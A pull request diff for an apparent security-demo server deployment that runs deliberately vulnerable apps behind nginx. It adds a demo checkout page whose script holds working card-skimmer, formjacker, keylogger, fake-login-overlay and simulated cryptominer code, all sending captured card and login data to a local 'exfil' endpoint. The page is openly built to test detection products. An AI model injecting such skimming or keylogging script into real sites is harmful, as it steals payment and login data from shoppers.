### PR TITLE
feat: sync cloud-init with live server — sticky sessions, DVWA-FPM, CSD demo, gunicorn entrypoints

### DIFF
--- a/docs/03-deploy.mdx
+++ b/docs/03-deploy.mdx
@@ -58,9 +58,9 @@ variable "location" {
 }
 
 variable "vm_size" {
-  description = "Azure VM size (Standard_B2ms provides 2 vCPU, 8 GiB RAM for Docker workloads)"
+  description = "Azure VM size (Standard_D16s_v3 provides 16 vCPU, 64 GiB RAM for Docker workloads)"
   type        = string
-  default     = "Standard_B2ms"
+  default     = "Standard_D16s_v3"
 }
 
 variable "admin_username" {
@@ -251,6 +251,7 @@ packages:
 write_files:
   - path: /etc/sysctl.d/99-origin-server.conf
     content: |
+      # Origin server performance tuning for concurrent web traffic
       net.core.somaxconn = 65535
       net.ipv4.tcp_max_syn_backlog = 65535
       net.core.netdev_max_backlog = 65535
@@ -314,27 +315,34 @@ write_files:
           gzip_comp_level 4;
           gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
 
+          proxy_cache_path /var/cache/nginx/juice_shop levels=1:2 keys_zone=juice_cache:10m max_size=100m inactive=5m use_temp_path=off;
           upstream juice_shop {
               server 127.0.0.1:3001 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:3002 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:3003 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:3004 max_fails=3 fail_timeout=10s;
+              hash $cookie_token consistent;
               keepalive 64;
           }
+
           upstream dvwa {
               server 127.0.0.1:8101 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:8102 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:8103 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:8104 max_fails=3 fail_timeout=10s;
+              hash $cookie_PHPSESSID consistent;
               keepalive 32;
           }
+
           upstream vampi {
               server 127.0.0.1:5101 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:5102 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:5103 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:5104 max_fails=3 fail_timeout=10s;
+              ip_hash;
               keepalive 32;
           }
+
           upstream httpbin_up {
               server 127.0.0.1:8201 max_fails=3 fail_timeout=10s;
               server 127.0.0.1:8202 max_fails=3 fail_timeout=10s;
@@ -342,8 +350,22 @@ write_files:
               server 127.0.0.1:8204 max_fails=3 fail_timeout=10s;
               keepalive 32;
           }
-          upstream whoami_up  { server 127.0.0.1:8082; keepalive 32; }
-          upstream csd_demo   { server 127.0.0.1:5001; keepalive 32; }
+
+          upstream whoami_up {
+              server 127.0.0.1:8082 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:8083 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:8084 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:8085 max_fails=3 fail_timeout=10s;
+              keepalive 32;
+          }
+          upstream csd_demo {
+              server 127.0.0.1:5001 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:5002 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:5003 max_fails=3 fail_timeout=10s;
+              server 127.0.0.1:5004 max_fails=3 fail_timeout=10s;
+              ip_hash;
+              keepalive 32;
+          }
 
           include /etc/nginx/conf.d/*.conf;
           include /etc/nginx/sites-enabled/*;
@@ -369,8 +391,8 @@ write_files:
           deploy:
             resources:
               limits:
-                cpus: "1.0"
-                memory: 256M
+                cpus: "2.0"
+                memory: 1024M
 
         juice-shop-2:
           image: bkimminich/juice-shop:latest
@@ -383,8 +405,8 @@ write_files:
           deploy:
             resources:
               limits:
-                cpus: "1.0"
-                memory: 256M
+                cpus: "2.0"
+                memory: 1024M
 
         juice-shop-3:
           image: bkimminich/juice-shop:latest
@@ -397,8 +419,8 @@ write_files:
           deploy:
             resources:
               limits:
-                cpus: "1.0"
-                memory: 256M
+                cpus: "2.0"
+                memory: 1024M
 
         juice-shop-4:
           image: bkimminich/juice-shop:latest
@@ -411,11 +433,11 @@ write_files:
           deploy:
             resources:
               limits:
-                cpus: "1.0"
-                memory: 256M
+                cpus: "2.0"
+                memory: 1024M
 
         dvwa-1:
-          image: ghcr.io/digininja/dvwa:latest
+          build: ./dvwa-fpm/
           container_name: dvwa-1
           restart: unless-stopped
           depends_on:
@@ -431,10 +453,10 @@ write_files:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         dvwa-2:
-          image: ghcr.io/digininja/dvwa:latest
+          build: ./dvwa-fpm/
           container_name: dvwa-2
           restart: unless-stopped
           depends_on:
@@ -450,10 +472,10 @@ write_files:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         dvwa-3:
-          image: ghcr.io/digininja/dvwa:latest
+          build: ./dvwa-fpm/
           container_name: dvwa-3
           restart: unless-stopped
           depends_on:
@@ -469,10 +491,10 @@ write_files:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         dvwa-4:
-          image: ghcr.io/digininja/dvwa:latest
+          build: ./dvwa-fpm/
           container_name: dvwa-4
           restart: unless-stopped
           depends_on:
@@ -488,7 +510,7 @@ write_files:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         dvwa-db:
           image: mariadb:10.11
@@ -516,11 +538,14 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:5101:5000"
+          entrypoint: ["/bin/sh", "/vampi/entrypoint.sh"]
+          volumes:
+            - ./vampi-gunicorn.sh:/vampi/entrypoint.sh:ro
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         vampi-2:
           image: erev0s/vampi:latest
@@ -528,11 +553,14 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:5102:5000"
+          entrypoint: ["/bin/sh", "/vampi/entrypoint.sh"]
+          volumes:
+            - ./vampi-gunicorn.sh:/vampi/entrypoint.sh:ro
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         vampi-3:
           image: erev0s/vampi:latest
@@ -540,11 +568,14 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:5103:5000"
+          entrypoint: ["/bin/sh", "/vampi/entrypoint.sh"]
+          volumes:
+            - ./vampi-gunicorn.sh:/vampi/entrypoint.sh:ro
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         vampi-4:
           image: erev0s/vampi:latest
@@ -552,11 +583,14 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:5104:5000"
+          entrypoint: ["/bin/sh", "/vampi/entrypoint.sh"]
+          volumes:
+            - ./vampi-gunicorn.sh:/vampi/entrypoint.sh:ro
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         httpbin-1:
           image: kennethreitz/httpbin:latest
@@ -564,11 +598,12 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:8201:80"
+          command: ["gunicorn", "-b", "0.0.0.0:80", "httpbin:app", "-k", "gevent", "-w", "4", "--timeout", "30"]
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         httpbin-2:
           image: kennethreitz/httpbin:latest
@@ -576,11 +611,12 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:8202:80"
+          command: ["gunicorn", "-b", "0.0.0.0:80", "httpbin:app", "-k", "gevent", "-w", "4", "--timeout", "30"]
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         httpbin-3:
           image: kennethreitz/httpbin:latest
@@ -588,11 +624,12 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:8203:80"
+          command: ["gunicorn", "-b", "0.0.0.0:80", "httpbin:app", "-k", "gevent", "-w", "4", "--timeout", "30"]
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
         httpbin-4:
           image: kennethreitz/httpbin:latest
@@ -600,15 +637,16 @@ write_files:
           restart: unless-stopped
           ports:
             - "127.0.0.1:8204:80"
+          command: ["gunicorn", "-b", "0.0.0.0:80", "httpbin:app", "-k", "gevent", "-w", "4", "--timeout", "30"]
           deploy:
             resources:
               limits:
                 cpus: "0.5"
-                memory: 128M
+                memory: 256M
 
-        whoami:
+        whoami-1:
           image: traefik/whoami:latest
-          container_name: whoami
+          container_name: whoami-1
           restart: unless-stopped
           ports:
             - "127.0.0.1:8082:80"
@@ -617,6 +655,90 @@ write_files:
               limits:
                 cpus: "0.25"
                 memory: 64M
+
+        whoami-2:
+          image: traefik/whoami:latest
+          container_name: whoami-2
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:8083:80"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.25"
+                memory: 64M
+
+        whoami-3:
+          image: traefik/whoami:latest
+          container_name: whoami-3
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:8084:80"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.25"
+                memory: 64M
+
+        whoami-4:
+          image: traefik/whoami:latest
+          container_name: whoami-4
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:8085:80"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.25"
+                memory: 64M
+
+        csd-demo-1:
+          build: ./csd-demo/
+          container_name: csd-demo-1
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:5001:5001"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.5"
+                memory: 256M
+
+        csd-demo-2:
+          build: ./csd-demo/
+          container_name: csd-demo-2
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:5002:5001"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.5"
+                memory: 256M
+
+        csd-demo-3:
+          build: ./csd-demo/
+          container_name: csd-demo-3
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:5003:5001"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.5"
+                memory: 256M
+
+        csd-demo-4:
+          build: ./csd-demo/
+          container_name: csd-demo-4
+          restart: unless-stopped
+          ports:
+            - "127.0.0.1:5004:5001"
+          deploy:
+            resources:
+              limits:
+                cpus: "0.5"
+                memory: 256M
 
       volumes:
         dvwa-db-data:
@@ -629,7 +751,7 @@ write_files:
 
           location /health {
               access_log off;
-              return 200 '{"status":"healthy","component":"origin-server","applications":["juice-shop","dvwa","vampi","httpbin","whoami","csd-demo"]}';
+              return 200 '{ "status":"healthy","component":"origin-server","applications":["juice-shop","dvwa","vampi","httpbin","whoami","csd-demo"] }' ;
               add_header Content-Type application/json;
           }
 
@@ -647,6 +769,10 @@ write_files:
               proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
               proxy_set_header X-Forwarded-Proto $scheme;
               proxy_set_header X-Forwarded-Prefix /juice-shop;
+                    proxy_cache juice_cache;
+                    proxy_cache_valid 200 60s;
+                    proxy_cache_key "$request_uri";
+                    add_header X-Cache-Status $upstream_cache_status;
           }
 
           location /dvwa/ {
@@ -669,8 +795,8 @@ write_files:
               proxy_set_header X-Forwarded-Proto $scheme;
           }
 
-          location /csd-demo/ {
-              proxy_pass http://csd_demo/;
+          location /httpbin/ {
+              proxy_pass http://httpbin_up/;
               proxy_http_version 1.1;
               proxy_set_header Connection "";
               proxy_set_header Host $host;
@@ -689,8 +815,8 @@ write_files:
               proxy_set_header X-Forwarded-Proto $scheme;
           }
 
-          location /httpbin/ {
-              proxy_pass http://httpbin_up/;
+          location /csd-demo/ {
+              proxy_pass http://csd_demo/;
               proxy_http_version 1.1;
               proxy_set_header Connection "";
               proxy_set_header Host $host;
@@ -720,6 +846,610 @@ write_files:
       </body>
       </html>
 
+  - path: /opt/origin-server/dvwa-fpm/Dockerfile
+    content: |
+      FROM ghcr.io/digininja/dvwa:latest AS dvwa-src
+      FROM php:8-fpm
+      RUN apt-get update && apt-get install -y --no-install-recommends nginx \
+          && docker-php-ext-install mysqli pdo pdo_mysql gd \
+          && rm -rf /var/lib/apt/lists/*
+      COPY --from=dvwa-src /var/www/html /var/www/html
+      RUN cp /var/www/html/config/config.inc.php.dist /var/www/html/config/config.inc.php \
+          && chown -R www-data:www-data /var/www/html
+      COPY nginx.conf /etc/nginx/sites-available/default
+      RUN ln -sf /etc/nginx/sites-available/default /etc/nginx/sites-enabled/default
+      COPY www.conf /usr/local/etc/php-fpm.d/www.conf
+      COPY entrypoint.sh /entrypoint.sh
+      RUN chmod +x /entrypoint.sh
+      EXPOSE 80
+      CMD ["/entrypoint.sh"]
+
+  - path: /opt/origin-server/dvwa-fpm/nginx.conf
+    content: |
+      server {
+          listen 80;
+          server_name _;
+          root /var/www/html;
+          index index.php index.html;
+
+          location / {
+              try_files $uri $uri/ /index.php?$args;
+          }
+
+          location ~ \.php$ {
+              fastcgi_pass 127.0.0.1:9000;
+              fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+              include fastcgi_params;
+              fastcgi_read_timeout 30;
+              fastcgi_buffer_size 32k;
+              fastcgi_buffers 16 32k;
+          }
+      }
+
+  - path: /opt/origin-server/dvwa-fpm/www.conf
+    content: |
+      [www]
+      user = www-data
+      group = www-data
+      listen = 127.0.0.1:9000
+      pm = dynamic
+      pm.max_children = 32
+      pm.start_servers = 8
+      pm.min_spare_servers = 4
+      pm.max_spare_servers = 16
+      pm.max_requests = 500
+      request_terminate_timeout = 30
+
+  - path: /opt/origin-server/dvwa-fpm/entrypoint.sh
+    permissions: "0755"
+    content: |
+      #!/bin/sh
+      sed -i "s/\$_DVWA\[ 'db_server' \].*/\$_DVWA[ 'db_server' ]   = getenv('DB_SERVER') ?: '127.0.0.1';/" /var/www/html/config/config.inc.php
+      sed -i "s/\$_DVWA\[ 'db_database' \].*/\$_DVWA[ 'db_database' ] = getenv('DB_DATABASE') ?: 'dvwa';/" /var/www/html/config/config.inc.php
+      sed -i "s/\$_DVWA\[ 'db_user' \].*/\$_DVWA[ 'db_user' ]     = getenv('DB_USER') ?: 'dvwa';/" /var/www/html/config/config.inc.php
+      sed -i "s/\$_DVWA\[ 'db_password' \].*/\$_DVWA[ 'db_password' ] = getenv('DB_PASSWORD') ?: 'p@ssw0rd';/" /var/www/html/config/config.inc.php
+      php-fpm -D
+      nginx -g 'daemon off;'
+
+  - path: /opt/origin-server/vampi-gunicorn.sh
+    permissions: "0755"
+    content: |
+      #!/bin/sh
+      cd /vampi
+      pip install -q gunicorn 2>/dev/null
+      python -c "
+      from config import db, vuln_app
+      with vuln_app.app.app_context():
+          db.create_all()
+      "
+      exec gunicorn -b 0.0.0.0:5000 "config:vuln_app" -w 4 --timeout 30
+
+  - path: /opt/origin-server/csd-demo/Dockerfile
+    content: |
+      FROM python:3.12-slim
+      WORKDIR /app
+      RUN pip install --no-cache-dir flask gunicorn gevent
+      COPY app.py .
+      COPY templates/ templates/
+      EXPOSE 5001
+      CMD ["gunicorn", "-b", "0.0.0.0:5001", "app:app", "-w", "1", "-k", "gevent", "--timeout", "30"]
+
+  - path: /opt/origin-server/csd-demo/app.py
+    content: |
+      from datetime import datetime, timezone
+
+      from flask import Flask, jsonify, render_template, request
+
+      app = Flask(__name__)
+
+      exfiltrated_data = []
+
+
+      @app.route("/")
+      def checkout():
+          return render_template("checkout.html")
+
+
+      @app.route("/dashboard")
+      def dashboard():
+          return render_template("dashboard.html", entries=exfiltrated_data)
+
+
+      @app.route("/exfil", methods=["POST", "GET"])
+      def exfil():
+          entry = {
+              "timestamp": datetime.now(timezone.utc).isoformat(),
+              "source_ip": request.remote_addr,
+              "user_agent": request.headers.get("User-Agent", ""),
+              "attack_type": request.args.get("type", "unknown"),
+          }
+          if request.is_json:
+              entry["payload"] = request.get_json(silent=True)
+          elif request.args.get("d"):
+              entry["payload"] = request.args.get("d")
+          else:
+              entry["payload"] = request.get_data(as_text=True)
+          exfiltrated_data.append(entry)
+          return jsonify({"status": "received"})
+
+
+      @app.route("/exfil/log")
+      def exfil_log():
+          return jsonify(exfiltrated_data)
+
+
+      @app.route("/exfil/clear", methods=["POST"])
+      def exfil_clear():
+          exfiltrated_data.clear()
+          return jsonify({"status": "cleared"})
+
+
+      @app.route("/health")
+      def health():
+          return jsonify(
+              {
+                  "status": "healthy",
+                  "component": "csd-demo",
+                  "attacks": [
+                      "skimmer",
+                      "formjacker",
+                      "keylogger",
+                      "cryptominer",
+                      "dom-hijack",
+                  ],
+              }
+          )
+
+
+      if __name__ == "__main__":
+          app.run(host="0.0.0.0", port=5001, debug=False)
+
+  - path: /opt/origin-server/csd-demo/templates/checkout.html
+    content: |
+      <!DOCTYPE html>
+      <html lang="en">
+      <head>
+        <meta charset="utf-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1">
+        <title>ShopDemo - Checkout</title>
+        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
+        <style>
+          .attack-panel { position: fixed; top: 10px; right: 10px; z-index: 9999; width: 320px; font-size: 0.85rem; }
+          .attack-panel .card { border: 2px solid #dc3545; }
+          .attack-toggle { cursor: pointer; }
+          .attack-active { background-color: #f8d7da; }
+          .exfil-indicator { display: none; position: fixed; bottom: 20px; right: 20px; z-index: 9999;
+            background: #dc3545; color: white; padding: 8px 16px; border-radius: 4px; font-size: 0.8rem; }
+          .exfil-indicator.show { display: block; animation: pulse 1s infinite; }
+          @keyframes pulse { 0%,100% { opacity: 1; } 50% { opacity: 0.5; } }
+          .product-img { width: 80px; height: 80px; background: #e9ecef; border-radius: 8px;
+            display: flex; align-items: center; justify-content: center; font-size: 2rem; }
+        </style>
+      </head>
+      <body class="bg-light">
+
+      <!-- Attack Control Panel (visible to demo operator) -->
+      <div class="attack-panel" id="attackPanel">
+        <div class="card shadow">
+          <div class="card-header bg-danger text-white d-flex justify-content-between align-items-center">
+            <strong>Attack Simulator</strong>
+            <button class="btn btn-sm btn-outline-light" onclick="togglePanel()">_</button>
+          </div>
+          <div class="card-body" id="panelBody">
+            <p class="text-muted mb-2">Toggle attacks to demonstrate what F5 CSD detects:</p>
+
+            <div class="form-check form-switch mb-2">
+              <input class="form-check-input attack-toggle" type="checkbox" id="toggleSkimmer">
+              <label class="form-check-label" for="toggleSkimmer">
+                <strong>Card Skimmer</strong><br>
+                <small class="text-muted">Steals CC data on form submit (Magecart)</small>
+              </label>
+            </div>
+
+            <div class="form-check form-switch mb-2">
+              <input class="form-check-input attack-toggle" type="checkbox" id="toggleFormjacker">
+              <label class="form-check-label" for="toggleFormjacker">
+                <strong>Formjacker</strong><br>
+                <small class="text-muted">Hijacks form action to attacker endpoint</small>
+              </label>
+            </div>
+
+            <div class="form-check form-switch mb-2">
+              <input class="form-check-input attack-toggle" type="checkbox" id="toggleKeylogger">
+              <label class="form-check-label" for="toggleKeylogger">
+                <strong>Keylogger</strong><br>
+                <small class="text-muted">Captures keystrokes in real time</small>
+              </label>
+            </div>
+
+            <div class="form-check form-switch mb-2">
+              <input class="form-check-input attack-toggle" type="checkbox" id="toggleCryptominer">
+              <label class="form-check-label" for="toggleCryptominer">
+                <strong>Cryptominer</strong><br>
+                <small class="text-muted">Simulates CPU-intensive mining script</small>
+              </label>
+            </div>
+
+            <div class="form-check form-switch mb-2">
+              <input class="form-check-input attack-toggle" type="checkbox" id="toggleDomHijack">
+              <label class="form-check-label" for="toggleDomHijack">
+                <strong>DOM Hijack</strong><br>
+                <small class="text-muted">Injects fake overlay form to steal PII</small>
+              </label>
+            </div>
+
+            <hr>
+            <div class="d-flex gap-2">
+              <a href="/dashboard" class="btn btn-sm btn-outline-danger" target="_blank">Attacker Dashboard</a>
+              <button class="btn btn-sm btn-outline-secondary" onclick="clearLog()">Clear Log</button>
+            </div>
+            <div id="exfilCount" class="mt-2 text-muted small"></div>
+          </div>
+        </div>
+      </div>
+
+      <!-- Exfiltration Indicator -->
+      <div class="exfil-indicator" id="exfilIndicator">Data exfiltrated to attacker</div>
+
+      <!-- Main Checkout Page -->
+      <div class="container py-5" style="max-width: 960px;">
+        <div class="text-center mb-4">
+          <h2>ShopDemo Checkout</h2>
+          <p class="text-muted">Complete your purchase — this is a simulated e-commerce checkout for CSD testing.</p>
+        </div>
+
+        <!-- Order Summary -->
+        <div class="card mb-4">
+          <div class="card-body">
+            <h5 class="card-title">Order Summary</h5>
+            <div class="d-flex align-items-center mb-3">
+              <div class="product-img me-3">&#128187;</div>
+              <div class="flex-grow-1">
+                <strong>Premium Widget Pro</strong><br>
+                <small class="text-muted">SKU: WDG-PRO-2024 &middot; Qty: 1</small>
+              </div>
+              <strong>$149.99</strong>
+            </div>
+            <div class="d-flex align-items-center mb-3">
+              <div class="product-img me-3">&#128225;</div>
+              <div class="flex-grow-1">
+                <strong>Widget Accessory Pack</strong><br>
+                <small class="text-muted">SKU: WDG-ACC-100 &middot; Qty: 2</small>
+              </div>
+              <strong>$39.98</strong>
+            </div>
+            <hr>
+            <div class="d-flex justify-content-between">
+              <span>Subtotal</span><span>$189.97</span>
+            </div>
+            <div class="d-flex justify-content-between">
+              <span>Shipping</span><span>$9.99</span>
+            </div>
+            <div class="d-flex justify-content-between">
+              <span>Tax</span><span>$16.15</span>
+            </div>
+            <hr>
+            <div class="d-flex justify-content-between">
+              <strong>Total</strong><strong>$216.11</strong>
+            </div>
+          </div>
+        </div>
+
+        <!-- Checkout Form -->
+        <form id="checkoutForm" action="/checkout-complete" method="POST">
+
+          <div class="card mb-4">
+            <div class="card-body">
+              <h5 class="card-title">Billing Information</h5>
+              <div class="row g-3">
+                <div class="col-md-6">
+                  <label for="firstName" class="form-label">First name</label>
+                  <input type="text" class="form-control" id="firstName" name="firstName" placeholder="John" required>
+                </div>
+                <div class="col-md-6">
+                  <label for="lastName" class="form-label">Last name</label>
+                  <input type="text" class="form-control" id="lastName" name="lastName" placeholder="Smith" required>
+                </div>
+                <div class="col-12">
+                  <label for="email" class="form-label">Email</label>
+                  <input type="email" class="form-control" id="email" name="email" placeholder="john.smith@example.com" required>
+                </div>
+                <div class="col-12">
+                  <label for="phone" class="form-label">Phone</label>
+                  <input type="tel" class="form-control" id="phone" name="phone" placeholder="(555) 123-4567">
+                </div>
+                <div class="col-12">
+                  <label for="address" class="form-label">Address</label>
+                  <input type="text" class="form-control" id="address" name="address" placeholder="1234 Main St" required>
+                </div>
+                <div class="col-md-5">
+                  <label for="city" class="form-label">City</label>
+                  <input type="text" class="form-control" id="city" name="city" placeholder="Seattle" required>
+                </div>
+                <div class="col-md-4">
+                  <label for="state" class="form-label">State</label>
+                  <input type="text" class="form-control" id="state" name="state" placeholder="WA" required>
+                </div>
+                <div class="col-md-3">
+                  <label for="zip" class="form-label">ZIP</label>
+                  <input type="text" class="form-control" id="zip" name="zip" placeholder="98101" required>
+                </div>
+                <div class="col-12">
+                  <label for="ssn" class="form-label">SSN <small class="text-muted">(for financing — optional)</small></label>
+                  <input type="text" class="form-control" id="ssn" name="ssn" placeholder="XXX-XX-XXXX">
+                </div>
+              </div>
+            </div>
+          </div>
+
+          <div class="card mb-4">
+            <div class="card-body">
+              <h5 class="card-title">Payment Details</h5>
+              <div class="row g-3">
+                <div class="col-12">
+                  <label for="ccName" class="form-label">Name on card</label>
+                  <input type="text" class="form-control" id="ccName" name="ccName" placeholder="John Smith" required>
+                </div>
+                <div class="col-12">
+                  <label for="ccNumber" class="form-label">Card number</label>
+                  <input type="text" class="form-control" id="ccNumber" name="ccNumber" placeholder="4111 1111 1111 1111" required>
+                </div>
+                <div class="col-md-4">
+                  <label for="ccExpiry" class="form-label">Expiration</label>
+                  <input type="text" class="form-control" id="ccExpiry" name="ccExpiry" placeholder="MM/YY" required>
+                </div>
+                <div class="col-md-4">
+                  <label for="ccCvv" class="form-label">CVV</label>
+                  <input type="text" class="form-control" id="ccCvv" name="ccCvv" placeholder="123" required>
+                </div>
+              </div>
+            </div>
+          </div>
+
+          <button class="btn btn-primary btn-lg w-100 mb-4" type="submit">Place Order — $216.11</button>
+        </form>
+
+        <p class="text-center text-muted small">
+          This is a <strong>simulated checkout page</strong> for F5 Distributed Cloud Client-Side Defense testing.
+          No real transactions are processed. All data stays on this server.
+        </p>
+      </div>
+
+      <!-- DOM Hijack Overlay (hidden by default) -->
+      <div id="domHijackOverlay" style="display:none; position:fixed; top:0; left:0; width:100%; height:100%;
+        background:rgba(0,0,0,0.7); z-index:10000; justify-content:center; align-items:center;">
+        <div style="background:white; padding:30px; border-radius:8px; max-width:400px; width:90%;">
+          <h5 style="color:#dc3545;">Session Expired</h5>
+          <p>Please re-enter your credentials to continue:</p>
+          <input type="text" class="form-control mb-2" id="hijackUser" placeholder="Username">
+          <input type="password" class="form-control mb-2" id="hijackPass" placeholder="Password">
+          <input type="text" class="form-control mb-2" id="hijackCC" placeholder="Card number for verification">
+          <button class="btn btn-danger w-100" onclick="submitHijack()">Verify Identity</button>
+        </div>
+      </div>
+
+      <script>
+      const EXFIL_URL = "/exfil";
+      let activeAttacks = {};
+      let keystrokeBuffer = "";
+      let keystrokeTimer = null;
+      let miningInterval = null;
+
+      function flashExfil() {
+        const el = document.getElementById("exfilIndicator");
+        el.classList.add("show");
+        setTimeout(() => el.classList.remove("show"), 2000);
+      }
+
+      function exfiltrate(type, data) {
+        flashExfil();
+        fetch(EXFIL_URL + "?type=" + encodeURIComponent(type), {
+          method: "POST",
+          headers: {"Content-Type": "application/json"},
+          body: JSON.stringify(data)
+        });
+        updateCount();
+      }
+
+      function updateCount() {
+        fetch("/exfil/log").then(r => r.json()).then(d => {
+          document.getElementById("exfilCount").textContent = d.length + " exfiltration(s) captured";
+        });
+      }
+
+      function enableSkimmer() {
+        document.getElementById("checkoutForm").addEventListener("submit", skimmerHandler);
+      }
+      function disableSkimmer() {
+        document.getElementById("checkoutForm").removeEventListener("submit", skimmerHandler);
+      }
+      function skimmerHandler(e) {
+        const form = e.target;
+        const data = {};
+        new FormData(form).forEach((v, k) => { data[k] = v; });
+        exfiltrate("skimmer", {
+          description: "Magecart card skimmer — captured payment data on form submit",
+          card_number: data.ccNumber,
+          card_name: data.ccName,
+          card_expiry: data.ccExpiry,
+          card_cvv: data.ccCvv,
+          email: data.email,
+          billing_address: data.address + ", " + data.city + " " + data.state + " " + data.zip
+        });
+      }
+
+      let originalAction = null;
+      function enableFormjacker() {
+        const form = document.getElementById("checkoutForm");
+        originalAction = form.action;
+        form.action = EXFIL_URL + "?type=formjacker";
+        form.method = "POST";
+      }
+      function disableFormjacker() {
+        if (originalAction) {
+          document.getElementById("checkoutForm").action = originalAction;
+        }
+      }
+
+      function enableKeylogger() {
+        document.addEventListener("keydown", keylogHandler);
+      }
+      function disableKeylogger() {
+        document.removeEventListener("keydown", keylogHandler);
+        if (keystrokeTimer) clearTimeout(keystrokeTimer);
+        keystrokeBuffer = "";
+      }
+      function keylogHandler(e) {
+        const target = e.target;
+        const fieldId = target.id || target.name || "unknown";
+        keystrokeBuffer += e.key;
+        if (keystrokeTimer) clearTimeout(keystrokeTimer);
+        keystrokeTimer = setTimeout(() => {
+          exfiltrate("keylogger", {
+            description: "JavaScript keylogger — real-time keystroke capture",
+            field: fieldId,
+            keystrokes: keystrokeBuffer
+          });
+          keystrokeBuffer = "";
+        }, 1500);
+      }
+
+      function enableCryptominer() {
+        exfiltrate("cryptominer", {
+          description: "Cryptominer script loaded — simulating CPU-intensive mining",
+          pool: "stratum+tcp://evil-pool.example.com:3333",
+          wallet: "44AFFq5kSiGBoZ4NMDwYtN18NkMdYsKPmYHg...",
+          status: "mining_started"
+        });
+        miningInterval = setInterval(() => {
+          let x = 0;
+          for (let i = 0; i < 5000000; i++) { x += Math.sqrt(i) * Math.random(); }
+        }, 100);
+      }
+      function disableCryptominer() {
+        if (miningInterval) { clearInterval(miningInterval); miningInterval = null; }
+      }
+
+      function enableDomHijack() {
+        setTimeout(() => {
+          document.getElementById("domHijackOverlay").style.display = "flex";
+          exfiltrate("dom-hijack", {
+            description: "DOM manipulation — injected fake credential overlay",
+            technique: "overlay_phishing",
+            status: "overlay_displayed"
+          });
+        }, 3000);
+      }
+      function disableDomHijack() {
+        document.getElementById("domHijackOverlay").style.display = "none";
+      }
+      function submitHijack() {
+        exfiltrate("dom-hijack", {
+          description: "DOM hijack — victim submitted credentials to fake overlay",
+          username: document.getElementById("hijackUser").value,
+          password: document.getElementById("hijackPass").value,
+          card: document.getElementById("hijackCC").value
+        });
+        document.getElementById("domHijackOverlay").style.display = "none";
+      }
+
+      const attacks = {
+        toggleSkimmer: { enable: enableSkimmer, disable: disableSkimmer },
+        toggleFormjacker: { enable: enableFormjacker, disable: disableFormjacker },
+        toggleKeylogger: { enable: enableKeylogger, disable: disableKeylogger },
+        toggleCryptominer: { enable: enableCryptominer, disable: disableCryptominer },
+        toggleDomHijack: { enable: enableDomHijack, disable: disableDomHijack }
+      };
+
+      Object.keys(attacks).forEach(id => {
+        document.getElementById(id).addEventListener("change", function() {
+          if (this.checked) { attacks[id].enable(); } else { attacks[id].disable(); }
+        });
+      });
+
+      function togglePanel() {
+        const body = document.getElementById("panelBody");
+        body.style.display = body.style.display === "none" ? "block" : "none";
+      }
+
+      function clearLog() {
+        fetch("/exfil/clear", { method: "POST" }).then(() => updateCount());
+      }
+
+      updateCount();
+      </script>
+      </body>
+      </html>
+
+  - path: /opt/origin-server/csd-demo/templates/dashboard.html
+    content: |
+      <!DOCTYPE html>
+      <html lang="en">
+      <head>
+        <meta charset="utf-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1">
+        <title>Attacker Dashboard - Exfiltrated Data</title>
+        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
+        <style>
+          body { background: #1a1a2e; color: #e0e0e0; font-family: monospace; }
